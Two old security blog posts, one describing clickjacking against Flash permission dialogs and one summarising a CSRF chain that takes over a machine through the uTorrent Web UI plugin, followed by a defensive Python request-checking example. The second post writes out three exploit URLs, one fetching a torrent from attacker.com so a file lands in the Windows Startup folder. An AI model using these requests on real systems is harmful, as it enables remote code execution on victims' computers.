Clickjacking revealed

October 27, 2008 by lamer

I just came back from the first day of OWASP AppSec Asia 2008 in Taipei. Besides two t-shirts, I got to be among the first privileged group to preview Robert Hansen’s presentation on Clickjacking. The show is scheduled for the second day, tomorrow, but I have to fly to Kuala Lumpur. How lucky am I!

Getting back to the issue, clickjacking basically borrows the user’s mouse click and spends it on another, unintended object such as a link or a button. For example, the website shows you a link; you click on it, thinking that you will be taken to the intended location. But hey, the browser sends a request to another location!

But that’s doable with plain JavaScript too. What’s new here is that the click you made could be placed on a button of an ActiveX control. Scary, no? The demo showed me that, with clickjacking, bad guys could force Flash player to turn on the microphone. When you visit an HTML page, some JavaScript activates a Flash component. This component asks the Flash player to turn on the microphone and start recording. Normally, Flash player will pop up a dialog with an OK button to ask for your permission before doing so. Now the mouse click that you made on the HTML page is borrowed and used to click on that OK button. And Flash player turns on the microphone. Or maybe the webcam. Or, wait, maybe something more than that. Whatever you can do with a mouse click, clickjacking allows the attacker to “help” you do that, silently.

Thank you Robert for the preview. It was way cool!

For the HITB 2008 KL goers, Jeremiah Grossman will be presenting the keynote “The art of Click Jacking” on the first day. And I will see you there too.


Own a box via CSRF

May 7, 2008 by RD

Rob Carter has posted a blog entry on how to pwn a box via a pure CSRF bug in a uTorrent plugin. When a user installs the uTorrent Web UI plugin, the plugin starts a locally running web server on the user’s machine. Basically, his CSRF exploit forces uTorrent to move completed downloads to an arbitrary directory on that system, download arbitrary torrents, and completely own the box.

  • The first CSRF turns on the “Move completed downloads” option on the uTorrent Web UI:
    http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=1
  • The second CSRF changes the path where completed torrent downloads are placed. For example:
    http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:\Documents%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup
  • The last CSRF forces the victim to download a torrent which points to an attacker-controlled file. Once the file is downloaded via torrent, uTorrent places it into the Startup folder, and Windows runs it automatically at the next boot:
    http://localhost:14774/gui/?action=add-url&s=http://www.attacker.com/file.torrent
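The root cause above is a local web UI that honours state-changing GET requests from any page the browser happens to load. As an added illustration (not uTorrent’s code and not from Rob Carter’s post), here is the gate such a UI would need in front of its `setsetting` and `add-url` actions: state changes only over POST, an Origin header (when present) that is the UI itself, and a per-session anti-CSRF token. The function name, the `token` parameter and the header names are assumptions; the actions and port come from the post.

```python
from urllib.parse import urlsplit, parse_qs
import hmac
import secrets

# Hypothetical hardening for a locally running web UI of the kind described
# in the post. The port and action names are taken from the post; the
# checking logic is an added example, not the plugin's own code.
LOCAL_ORIGINS = {"http://localhost:14774", "http://127.0.0.1:14774"}
STATE_CHANGING = {"setsetting", "add-url"}


def new_session_token():
    # Issued once per UI session and embedded in the UI's own forms/XHRs;
    # a third-party page cannot read it, so it cannot forge a valid request.
    return secrets.token_urlsafe(32)


def is_request_allowed(method, url, headers, session_token):
    """Return (allowed, reason) for an incoming request to the local UI."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    query = parse_qs(urlsplit(url).query)
    action = query.get("action", [""])[0]

    # Read-only actions carry no CSRF risk; let them through.
    if action not in STATE_CHANGING:
        return True, "read-only action"

    # A cross-site <img>/<script>/redirect can only trigger GET; refuse it.
    if method.upper() != "POST":
        return False, "state-changing action must use POST"

    # Browsers attach Origin to cross-site POSTs (e.g. auto-submitted forms);
    # anything that is not the UI itself is a forgery attempt.
    origin = hdrs.get("origin")
    if origin is not None and origin not in LOCAL_ORIGINS:
        return False, "cross-origin request rejected"

    # Finally require the session-bound token (constant-time comparison).
    token = hdrs.get("x-csrf-token") or query.get("token", [""])[0]
    if not token or not hmac.compare_digest(token, session_token):
        return False, "missing or invalid anti-CSRF token"

    return True, "ok"
```

With this gate all three requests from the post are refused as plain GETs, and a cross-site form POST is refused for its foreign Origin before the token is even looked at.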